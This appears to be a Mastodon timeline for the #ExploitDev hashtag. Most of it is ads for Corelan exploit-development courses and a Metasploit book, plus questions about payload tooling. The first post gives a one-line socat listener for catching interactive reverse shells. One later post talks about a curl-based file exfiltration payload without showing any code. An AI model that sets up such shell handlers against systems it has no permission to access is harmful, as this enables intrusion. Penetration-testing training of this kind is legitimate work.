#ExploitDev

2025-06-01

If you're still battling netcat for stable reverse shells over shaky connections?

Replace nc -lvnp <port> with:
socat TCP-L:<port> EXEC:'bash -li',pty,stderr,setsid,sane

TTY hell is optional. socat gives you a proper interactive PTY every time.

#ExploitDev #RedTeam #Pentesting #Shells #Hacking

ς๏гєɭคภς0๔3г :verified:corelanc0d3r@infosec.exchange
2025-05-30

💥 Push, Pop, Boom.

 Corelan Stack isn’t just another exploit dev course — it’s where things finally click.

Expert-level stack exploitation. Zero fluff. The OG.

 🧠 Hands-on labs that challenge.
 🔥 Taught by a pioneer in the field.

"Filled in gaps I didn’t even know I had." — Fabio, Brazil

 👉 bit.ly/corelan-training

#Corelan #Stack #Windows11 #ExpertLevel #ExploitDev #Cybersecurity #Infosec #Hacking #Training

No Starch Pressnostarch
2025-05-20

Go beyond just using Metasploit – learn to build with it.

This comprehensive 2nd Edition guides you with foundational commands through porting public exploits (Chapter 12), building your own modules in Ruby (Chapter 13), and even fuzzing for novel vulnerabilities (Chapter 14).

Elevate individual skills while enriching the broader field.

nostarch.com/metasploit-2nd-ed

The cover for "Metasploit The Penetration Tester's Guide, 2nd Edition" by No Starch Press. It features a vintage-textured brown background, with a "skeleton key" in the center, with the authors' names below it. The No Starch Press logo appears in the bottom right-hand corner.
ς๏гєɭคภς0๔3г :verified:corelanc0d3r@infosec.exchange
2025-03-24

Your exploit dev training journey starts right here!

Corelan’s “Expert-Level Stack” exploit dev course for Windows 11 delivers unmatched depth, quality, and hands-on experience.

What our students say on the #Corelan Stack course:

🗣️ “Peter will refute about every single thing you might have learned so far related to the topic in other courses… and then teach you it the right way from the ground up”

See for yourself: 👉🏼👉🏼👉🏼 bit.ly/corelan-training

#corelan #stack #exploitdev #win11

ς๏гєɭคภς0๔3г :verified:corelanc0d3r@infosec.exchange
2025-03-22

Moving from Slack to Discord. You're welcome to join, hang out, contribute to the community. Be nice. discord.gg/DjfR5ntXrb #corelancommunity #corelantraining #exploitdev #safeplace

ς๏гєɭคภς0๔3г :verified:corelanc0d3r@infosec.exchange
2025-03-08

Still looking for a reason to take a Corelan Training?
👇👇👇👇👇
bit.ly/corelan-training

#corelan #stack #heap #exploitdev #windows11

ς๏гєɭคภς0๔3г :verified:corelanc0d3r@infosec.exchange
2025-03-03

5 reasons to take a 𝑪𝒐𝒓𝒆𝒍𝒂𝒏 class:

💛 All created & taught by @corelanc0d3r - It's a real class, yo
💭 Real skills, No hand-holding
🔬 Unmatched depth in stack & heap coverage
💪🏼 Mastery, not just basics
💰 Exclusive post-training support

#corelan #stack #heap #exploitdev #windows11 #corelantraining #masterclass

👉🏼 Sign up NOW, find out for yourself 👉🏼 bit.ly/corelan-training

🙏🏻 Sharing is caring 💛

ς๏гєɭคภς0๔3г :verified:corelanc0d3r@infosec.exchange
2025-02-27

𝑪𝒊𝒂𝒐 𝑰𝒕𝒂𝒍𝒚, 𝑪𝒊𝒂𝒐 𝑹𝒐𝒎𝒂! 𝑹𝒆𝒂𝒅𝒚 𝒇𝒐𝒓 𝑪𝒐𝒓𝒆𝒍𝒂𝒏?

Sign up for our Expert-level stack class: bit.ly/corelan-training

#corelan #stack #exploitdev #windows11

ς๏гєɭคภς0๔3г :verified:corelanc0d3r@infosec.exchange
2025-02-21

Still looking for a reason to take a Corelan Training?
👇👇👇👇👇
bit.ly/corelan-training

#corelan #stack #heap #exploitdev #windows11

2024-11-28

Already enjoying the exploits.club/ newsletter. Don't let the "coming soon..." website fool you, the content is high quality.

#exploitdev #ExploitDevelopment

2024-11-22

Hey if you are into #exploitdev and binary exploitation maybe you will enjoy reading my two latest blog post about exploiting some memory corruption vulnerabilities found on a students project. The second post was even posted on the exploits.club newsletter.

Post 1 lucabtz.com/blog/attempt-at-pw

Post 2 lucabtz.com/blog/attempt-at-pw

2024-08-10

How common is RC4 vs. RC5 in the wild? I assume there's still plenty of vulnerable legacy software out there that's still using RC4. Would still supporting RC4 be useful for writing exploits or diminishing returns?
#exploitdev #ExploitDevelopment

2024-05-07

How useful would you say a command injection payload that exfils a single file via curl to a webserver might be? Do you think it should be built-in to a framework or offered as a 3rd-party thing?
#pentesting #exploitdev #payloads

2023-12-15

For a tool that compiles C payloads, how would you prefer to specify the cross-compiler?
#payloads #pentesting #redteaming #exploitdev

2023-11-26

What is a good example vulnerability that I could use to write a "How To Write An Exploit" style tutorial?
#exploitdev #xdev #vulndev

ς๏гєɭคภς0๔3г :verified:corelanc0d3r@infosec.exchange
2023-10-24

This week was the last public class of 2023, we’re already filling up the agenda for 2024. However, we still have some timeslots for private classes. (either at your company or in Belgium, for small groups). Interested? DM for info! #corelan #exploitdev #windows11 #stack #heap

ς๏гєɭคภς0๔3г :verified:corelanc0d3r@infosec.exchange
2023-10-18

Stoked for class this week at Deep Conference (Zagreb, Croatia), Ready to give my all. Bring it on folks! #excited #corelan #bootcamp #exploitdev #windows11 #inpersontraining

Client Info

Server: https://mastodon.social
Version: 2025.04
Repository: https://github.com/cyevgeniy/lmst